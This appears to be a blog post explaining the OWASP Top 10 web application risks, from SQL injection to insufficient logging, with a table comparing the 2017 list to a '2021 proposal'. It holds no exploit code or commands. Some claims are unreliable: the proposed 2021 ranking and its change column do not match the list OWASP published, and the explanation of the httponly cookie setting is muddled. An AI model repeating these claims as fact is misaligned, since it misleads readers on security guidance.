Earlier last week , have discussed on SAN Top 20 Application Vulnerabilities . Here another Open Organization list the vulnerabilities according to the depth of the vulnerability exploits

The Open Web Application Security Project (OWASP) is a non-profit organization founded in 2001, with the goal of helping website owners and security experts protect web applications from cyber attacks

OWASP Top 10 is a widely accepted document that prioritizes the most important security risks affecting web applications. Although there are many more than ten security risks, the idea behind the OWASP Top 10 is to make security professionals keenly aware of at least the most critical security risks and learn how to defend against them.

OWASP periodically evaluates important types of cyber-attacks by four criteria: ease of exploitability, prevalence, detectability, and business impact, and selects the top 10 attacks. The OWASP Top 10 was first published in 2003 and has since been updated in 2004, 2007, 2010, 2013, and 2017 and due to release for 2021

The rating was compiled based on user posts and open discussions. OWASP Top 10 list is based on eight databases from seven companies, including four consulting firms and three SaaS vendors. The general database contains over 500,000 vulnerabilities in hundreds of organizations and thousands of applications

S.NoOWASP Top 10 2017 2017-2021 ChangeOWASP Top 10 Proposal 2021
A1Injections No changeInjections
A2Broken Authentication No ChangeBroken Authentication
A3Sensitive Data Exposure Down 1Cross-Site Scripting (XSS)
A4XML Extrernal entities Down 1 + A8Sensitive Data Exposure
A5Broken Access Control Down 1Insecure Deserialization
A6Security Misconfiguration Down 4Broken Access Control
A7Cross-Site Scripting (XSS) UP 4Insufficient Logging & Monitoring
A8Insecure Deserialization UP 3 +A4Server-Side Request Forgery (SSRF)
A9Known Vulnerabilities No ChangeKnown Vulnerabilities
A10Insufficient Logging & Monitoring UP 3Security Misconfiguration

1. SQL Injection

All data, as a rule, is stored in special databases, the requests to which are built in the form of queries, most often written in a Structured Query Language – SQL. Applications use SQL queries to receive, add, change, or remove data, for example, when the customer edits his personal data or completes a questionnaire on the webpage. In case of the user’s information insufficiently checked, a hacker can change the app’s code that contains the SQL query part.

This is a very insecure weakness that can give an intruder access to the database, as well as the ability to see, modify or delete data. In such a way, the hacker can steal confidential personal data. The weakness is the aftermath of insufficient validation of user data, so that allows an intruder to put into web forms specially prepared requests that “trick” the app and allow reading or writing illegitimate data.

2. Broken Authentication

If someone needs to distinguish another user, the web application applies session cookies. After entering login and password when the authorization in the application is successfully completed, a special identifier is saved in the specified storage, which the program subsequently sends to the server with every query for a page of the app. This is the way web application recognizes users.

In case of this identifier is stolen by a hacker, and the IT structure did not implement checks, for instance, session’s IP address, or checks for more than one connection in one session, the intruder gains the possibility to get into the system with the user’s account. And if it is an Internet bank or a payment system cabinet, you can easily guess for yourself the consequences of such unauthorized access.

3. Sensitive Data Exposure

The thing is that the information transmitted via the HTTP protocol is not cyphered in any way, and when sensitive information goes to the Web server from the device of the user, the data will go through a good many different nodes such as an office router or home router, a provider’s router, a router on a channel, a router in a datacentre or the hosting provider server. Each of these nodes can contain malware, called ‘sniffer’, a program that reads all traffic and sends it on to the hacker. So, the hacker looks at the received data for personal info and banking card information.

lack of encryption of such confidential information like user’s password or bank card details makes data vulnerable to theft. However, in case it is cyphered, then even if unallowed entry to the server is obtained, a hacker can’t steal critical data.

4. XML External Entities (XXE)

The biggest risk with XXE is the huge variety of ways in which it can be exploited. Whether simple or complex, if an external piece of code can make its way onto an XML document, this means that the system has been compromised. XML’s ubiquity means that applications making use of XML are likely to intersect with a lot of sensitive data.

The most widely-known form of XXE attack is known as the ‘Billion Laughs’ attack or the ‘XML Bomb‘. This is a simple but effective denial of service attack used to overload and shut down a target server. By defining an entity as a nested string of other entities, an attacker can quickly overload the system’s resources.

5. Broken Access Control

The essence of this OWASP Top 10 vulnerability, as the name suggests, is the lack of verification of proper access to the requested object. Most web applications check permissions before displaying data in the user interface. However, applications must perform the same access control checks on the server when requesting any function. After all, there are many more auxiliary services requests, which are often sent asynchronously in the background using AJAX technology. If the request parameters are not carefully validated, attackers could spoof the request to access data without proper permission.

6. Security Misconfigurations

Web application security controls every infrastructure element, for example, application frameworks, all kinds of servers, and the whole system itself. The default settings of server components are often insecure and open opportunities for leaks. For instance, the theft of a session cookie via JavaScript in an XSS attack becomes possible thanks to the cookie http only setting, which is disabled by default. If the server is configured correctly and the cookie http only option is enabled, it is impossible to receive a session cookie through JavaScript, but often this simple and important setting is missing in such critical places as personal accounts of payment systems.

7. Cross-Site Scripting (XSS)

Cross-site Scripting (XSS) is an injection attack that usually happens when a malicious actor or an attacker injects malicious or harmful script into a web application which can be executed through the web browsers. Once the malicious script finds its way into the compromised system, it can be used to perform different malicious activities like transferring private information like cookies that have the session information from the victim’s computer to the attacker’s computer.

8. Insecure Deserialization

Serialization and deserialization are important concepts in object-oriented programming frameworks, such as Java and .Net; and are consequently common to many web applications. An insecure deserialization vulnerability exists when an application doesn’t properly secure this process. If a deserialization implementation is left to its default settings, an application can have little to no control over what data is deserialized. In the most extreme cases, this can include any incoming serialized data from any source, with no verification or precautions.

9. Using Components with Known Vulnerabilities

Web applications are developed using special libraries or “frameworks” that are provided by third parties. In most cases, these components are open source, which means that not only you but also millions of people around the world are studying their source code, and for vulnerabilities too. They are also looking for weaknesses in lower-level components of the system, like different servers or the components of the OS down to its kernel. It is very important to use the latest components and keep an eye on emerging known vulnerabilities.

10. Insufficient Logging and Monitoring

The problem of insufficient logging and monitoring covers the entire IT infrastructure and not just the internet-facing web application – as does the solution. For that reason, we will not limit this discussion to just logging and monitoring web apps. One of the primary problems is that there are so many logs – almost all contemporary systems generate their own logs. Log management thus becomes a major problem. By the time that all the different logs are gathered and preferably collated, the sheer size of the data set becomes too large to effectively monitor manually.

Final Thoughts

Security of most web apps remains poor. Every second resource has high-risk weaknesses from the OWASP Top 10 list. However, the share of web applications comprising critical vulnerabilities is gradually decreasing. The next positive trend is that organizations are starting to pay more attention to the protection of their apps, and not only public ones, but also used for internal needs.The number of hacks of web apps will decline if identified vulnerabilities are fixed as early as possible and processes are automated where possible.

Web applications are constantly updated, and along with new features new vulnerabilities may appear and then further included in the next OWASP Top 10 vulnerability list update. Cybersecurity protection services must not only detect and prevent known attacks at the applications but also identify the exploitation of zero-day vulnerabilities, prevent attacks on users, analyze and correlate events to monitor attack chains.